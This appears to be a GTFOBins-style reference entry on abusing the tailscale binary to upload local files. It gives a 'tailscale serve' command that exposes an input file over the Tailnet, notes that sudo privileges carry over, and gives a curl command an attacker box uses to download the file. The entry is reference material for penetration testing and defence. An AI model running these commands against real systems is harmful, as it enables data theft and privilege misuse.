This executable can upload local data.
The URL is reachable by any host of the same Tailnet.
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
sudo
If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....
sudo VAR=value ...
sudo -E ...
tailscale serve --http=12345 /path/to/input-file
An HTTP client can be used on the attacker box to receive the data.
The actual URL is returned by the command.
curl http://<hostname>.<tailnet>.ts.net:12345/ -o /path/to/output-file
Source | History